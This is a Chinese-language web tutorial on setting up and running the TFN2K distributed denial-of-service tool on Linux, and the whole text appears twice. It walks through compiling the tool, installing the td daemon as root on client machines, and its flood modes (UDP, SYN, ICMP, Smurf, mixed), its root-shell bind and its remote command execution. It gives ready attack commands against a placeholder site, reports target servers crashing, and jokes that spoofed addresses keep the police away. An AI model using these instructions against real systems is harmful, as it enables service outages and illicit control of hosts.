Linux系統(tǒng)實(shí)現(xiàn)DDOS攻擊的方法
時(shí)間:2010-07-15 22:38:22 整理:佚名 []
軟件用的是 有名的DDOS,首先說我們用來攻擊的客戶機(jī)和服務(wù)器的配置方法,使用當(dāng)下 有名的REDHAT Linux進(jìn)行測試,本次攻擊測試我使用的是FEDORA CORE3。
開始設(shè)置服務(wù)器:
解壓 tar -zxvf tfn2k.tgz
1.安裝TFN2K
TFN2K為開放原代碼的軟件,所以需要我們進(jìn)行編譯,這個(gè)不用說了,編譯應(yīng)該都會(huì)的吧,但有幾個(gè)地方是必需注意的,因?yàn)槭褂貌煌姹竞蛷S商的Linux需要不同的設(shè)置。
先修改src/ip.h
注釋掉以下部分,否則編譯出錯(cuò)。
/*struct in_addr
{
unsigned long int s_addr;
}; */
然后make進(jìn)行編譯
編譯時(shí)會(huì)提示你輸入服務(wù)器端進(jìn)行密碼設(shè)置8-32位,(攻擊的時(shí)候需要輸入密碼)編譯后會(huì)出現(xiàn)兩個(gè)新的執(zhí)行文件td 和 tfn,其中td是守護(hù)進(jìn)程,也是客戶機(jī)的使用進(jìn)程。而tfn是服務(wù)器控制進(jìn)程,如果想攻擊別人就必需先起動(dòng)td這個(gè)進(jìn)程,然后再運(yùn)行服務(wù)器進(jìn)程,否則攻 擊無效,更改密碼可以執(zhí)行mkpass進(jìn)行更改。 后在所有的客戶機(jī)中安裝并運(yùn)行td(需要ROOT權(quán)限),并且在服務(wù)器上建立一個(gè)文本文件,文件中記錄 所有的客戶機(jī)IP地址(用VI編輯一個(gè)就可行了),格式為:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
然后在主服務(wù)器上運(yùn)行./tfn
2.DDOS攻擊實(shí)現(xiàn)
./tfn直接回車大家可以看到一些參數(shù),英文好的朋友估計(jì)不用我來多講了:)
格式./tfn <參數(shù)>
無用的參數(shù)我們不提,我們來說攻擊用的
-f 這個(gè)參數(shù)后面跟剛才所寫的文本文件名,就是真正實(shí)現(xiàn)DDOS攻擊,而不是DOS
-h DOS攻擊,也就是單機(jī),一對(duì)一的攻擊 后面跟一個(gè)主機(jī)或IP地址
-p 后面指定一個(gè)端口,不用說了
-c 關(guān)鍵的參數(shù),一共有11個(gè)選相
0 - 停止攻擊,發(fā)善心用的
1 - 反欺騙等級(jí)設(shè)定 ,因?yàn)門FN這個(gè)工具在攻擊的時(shí)候所發(fā)出的數(shù)據(jù)包是帶有源地址的,但是源地址是隨機(jī)的,也就是說地址不是你自給的,所以不用擔(dān)心警察抓,哈哈
2 - 改編數(shù)據(jù)包的包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用 小包。你可以通過改變每個(gè)包的有效載荷的字節(jié)增加它的大小。
3 - 綁定root shell:啟動(dòng)一個(gè)會(huì)話服務(wù),然后你連接一個(gè)指定端口就可以得到一個(gè)root shell。
4 - UDP洪水攻擊:這個(gè)攻擊是利用這樣一個(gè)事實(shí):每個(gè)udp包被送往一個(gè)關(guān)閉的端口,這樣就會(huì)有一個(gè)ICMP不可到達(dá)的信息返回,增加了攻擊的能力。
5 - SYN洪水攻擊:這個(gè)攻擊有規(guī)律的送虛假的連接請(qǐng)求。結(jié)果會(huì)是目標(biāo)端口拒絕服務(wù),添瞞TCP連接表,通過對(duì)不存在主機(jī)的TCP/RST響應(yīng)增加攻擊潛力,是標(biāo)準(zhǔn)的拒絕服務(wù)攻擊.
6 - ICMP響應(yīng)(ping)攻擊:這個(gè)攻擊發(fā)送虛假地址的ping請(qǐng)求,目標(biāo)主機(jī)會(huì)回送相同大小的響應(yīng)包。
7 - SMURF攻擊:用目標(biāo)主機(jī)的地址發(fā)送ping請(qǐng)求以廣播擴(kuò)大,這樣目標(biāo)主機(jī)將得到回復(fù)一個(gè)多倍的回復(fù)。
8 - MIX攻擊:按照1:1:1的關(guān)系交替的發(fā)送udp,syn,icmp包,這樣就可以對(duì)付路由器,其它包轉(zhuǎn)發(fā)設(shè)備,NIDS,sniffers等,輪番轟炸:)
9 - TARGA3攻擊
10 - 遠(yuǎn)程命令執(zhí)行,這個(gè)參數(shù)是TFN的附加功能,其實(shí)TFN的攻擊不僅僅是DOS,還可以遠(yuǎn)程的進(jìn)行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立edison,-i后面跟"命令"
參數(shù)基本說完,下面攻擊
./tfn -f hostext -c 4 -i www.xxx.com
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行UDP攻擊(所有的主機(jī)中必需已經(jīng)起動(dòng)td進(jìn)程)
./tfn -f hostext -c 5 -i www.xxx.com -p 80
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行TCP拒絕服務(wù)攻擊(80攻擊WEB,其他不用說了)
./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行ICMP攻擊(PING攻擊,緩沖區(qū)溢出馬上死機(jī))
./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行ICMP&TCP&UDP輪番攻擊(如果對(duì)方是sniffer一定哭死)
./tfn -f hostext -c 0
讓所由主機(jī)停止攻擊
基本說完, 后說說我的測試結(jié)果
一對(duì)一攻擊,攻擊方式TCP 連接方式本地 本地CPU13% 被攻擊的服務(wù)器CPU使用率70%以上,并時(shí)時(shí)波動(dòng)
二對(duì)一攻擊,攻擊方式TCP 連接方式本地 本地單機(jī)CPU13% 被攻擊的服務(wù)器CPU使用率
五對(duì)一攻擊,攻擊方式TCP 連接方式本地 本地單機(jī)CPU13% 被攻擊的服務(wù)器死機(jī).本人家里只有6臺(tái)機(jī)器,但如果再多點(diǎn),幾十臺(tái)機(jī)器,一般的個(gè)人服務(wù)器肯定要死掉了
一對(duì)一攻擊,攻擊方式ICMP 連接方式本地 本地CPU18% 被攻擊的服務(wù)器CPU使用率96%以上,并時(shí)時(shí)波動(dòng)二對(duì)一攻擊,攻擊方式ICMP 連接方式本地 本地單機(jī)CPU18% 被攻擊的服務(wù)器以經(jīng)無法上網(wǎng),幾乎無法使用,半小時(shí)內(nèi)死機(jī)。
開始設(shè)置服務(wù)器:
解壓 tar -zxvf tfn2k.tgz
1.安裝TFN2K
TFN2K為開放原代碼的軟件,所以需要我們進(jìn)行編譯,這個(gè)不用說了,編譯應(yīng)該都會(huì)的吧,但有幾個(gè)地方是必需注意的,因?yàn)槭褂貌煌姹竞蛷S商的Linux需要不同的設(shè)置。
先修改src/ip.h
注釋掉以下部分,否則編譯出錯(cuò)。
/*struct in_addr
{
unsigned long int s_addr;
}; */
然后make進(jìn)行編譯
編譯時(shí)會(huì)提示你輸入服務(wù)器端進(jìn)行密碼設(shè)置8-32位,(攻擊的時(shí)候需要輸入密碼)編譯后會(huì)出現(xiàn)兩個(gè)新的執(zhí)行文件td 和 tfn,其中td是守護(hù)進(jìn)程,也是客戶機(jī)的使用進(jìn)程。而tfn是服務(wù)器控制進(jìn)程,如果想攻擊別人就必需先起動(dòng)td這個(gè)進(jìn)程,然后再運(yùn)行服務(wù)器進(jìn)程,否則攻 擊無效,更改密碼可以執(zhí)行mkpass進(jìn)行更改。 后在所有的客戶機(jī)中安裝并運(yùn)行td(需要ROOT權(quán)限),并且在服務(wù)器上建立一個(gè)文本文件,文件中記錄 所有的客戶機(jī)IP地址(用VI編輯一個(gè)就可行了),格式為:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
然后在主服務(wù)器上運(yùn)行./tfn
2.DDOS攻擊實(shí)現(xiàn)
./tfn直接回車大家可以看到一些參數(shù),英文好的朋友估計(jì)不用我來多講了:)
格式./tfn <參數(shù)>
無用的參數(shù)我們不提,我們來說攻擊用的
-f 這個(gè)參數(shù)后面跟剛才所寫的文本文件名,就是真正實(shí)現(xiàn)DDOS攻擊,而不是DOS
-h DOS攻擊,也就是單機(jī),一對(duì)一的攻擊 后面跟一個(gè)主機(jī)或IP地址
-p 后面指定一個(gè)端口,不用說了
-c 關(guān)鍵的參數(shù),一共有11個(gè)選相
0 - 停止攻擊,發(fā)善心用的
1 - 反欺騙等級(jí)設(shè)定 ,因?yàn)門FN這個(gè)工具在攻擊的時(shí)候所發(fā)出的數(shù)據(jù)包是帶有源地址的,但是源地址是隨機(jī)的,也就是說地址不是你自給的,所以不用擔(dān)心警察抓,哈哈
2 - 改編數(shù)據(jù)包的包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用 小包。你可以通過改變每個(gè)包的有效載荷的字節(jié)增加它的大小。
3 - 綁定root shell:啟動(dòng)一個(gè)會(huì)話服務(wù),然后你連接一個(gè)指定端口就可以得到一個(gè)root shell。
4 - UDP洪水攻擊:這個(gè)攻擊是利用這樣一個(gè)事實(shí):每個(gè)udp包被送往一個(gè)關(guān)閉的端口,這樣就會(huì)有一個(gè)ICMP不可到達(dá)的信息返回,增加了攻擊的能力。
5 - SYN洪水攻擊:這個(gè)攻擊有規(guī)律的送虛假的連接請(qǐng)求。結(jié)果會(huì)是目標(biāo)端口拒絕服務(wù),添瞞TCP連接表,通過對(duì)不存在主機(jī)的TCP/RST響應(yīng)增加攻擊潛力,是標(biāo)準(zhǔn)的拒絕服務(wù)攻擊.
6 - ICMP響應(yīng)(ping)攻擊:這個(gè)攻擊發(fā)送虛假地址的ping請(qǐng)求,目標(biāo)主機(jī)會(huì)回送相同大小的響應(yīng)包。
7 - SMURF攻擊:用目標(biāo)主機(jī)的地址發(fā)送ping請(qǐng)求以廣播擴(kuò)大,這樣目標(biāo)主機(jī)將得到回復(fù)一個(gè)多倍的回復(fù)。
8 - MIX攻擊:按照1:1:1的關(guān)系交替的發(fā)送udp,syn,icmp包,這樣就可以對(duì)付路由器,其它包轉(zhuǎn)發(fā)設(shè)備,NIDS,sniffers等,輪番轟炸:)
9 - TARGA3攻擊
10 - 遠(yuǎn)程命令執(zhí)行,這個(gè)參數(shù)是TFN的附加功能,其實(shí)TFN的攻擊不僅僅是DOS,還可以遠(yuǎn)程的進(jìn)行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立edison,-i后面跟"命令"
參數(shù)基本說完,下面攻擊
./tfn -f hostext -c 4 -i www.xxx.com
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行UDP攻擊(所有的主機(jī)中必需已經(jīng)起動(dòng)td進(jìn)程)
./tfn -f hostext -c 5 -i www.xxx.com -p 80
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行TCP拒絕服務(wù)攻擊(80攻擊WEB,其他不用說了)
./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行ICMP攻擊(PING攻擊,緩沖區(qū)溢出馬上死機(jī))
./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中記錄的主機(jī)對(duì)163服務(wù)器進(jìn)行ICMP&TCP&UDP輪番攻擊(如果對(duì)方是sniffer一定哭死)
./tfn -f hostext -c 0
讓所由主機(jī)停止攻擊
基本說完, 后說說我的測試結(jié)果
一對(duì)一攻擊,攻擊方式TCP 連接方式本地 本地CPU13% 被攻擊的服務(wù)器CPU使用率70%以上,并時(shí)時(shí)波動(dòng)
二對(duì)一攻擊,攻擊方式TCP 連接方式本地 本地單機(jī)CPU13% 被攻擊的服務(wù)器CPU使用率
五對(duì)一攻擊,攻擊方式TCP 連接方式本地 本地單機(jī)CPU13% 被攻擊的服務(wù)器死機(jī).本人家里只有6臺(tái)機(jī)器,但如果再多點(diǎn),幾十臺(tái)機(jī)器,一般的個(gè)人服務(wù)器肯定要死掉了
一對(duì)一攻擊,攻擊方式ICMP 連接方式本地 本地CPU18% 被攻擊的服務(wù)器CPU使用率96%以上,并時(shí)時(shí)波動(dòng)二對(duì)一攻擊,攻擊方式ICMP 連接方式本地 本地單機(jī)CPU18% 被攻擊的服務(wù)器以經(jīng)無法上網(wǎng),幾乎無法使用,半小時(shí)內(nèi)死機(jī)。
百度中找“Linux系統(tǒng)實(shí)現(xiàn)DDOS攻擊的方法”的內(nèi)容
GOOGLE中找“Linux系統(tǒng)實(shí)現(xiàn)DDOS攻擊的方法”的內(nèi)容
|
 |
關(guān)鍵詞:Linux系統(tǒng)實(shí)現(xiàn)DDOS攻擊的方法 相關(guān)文章
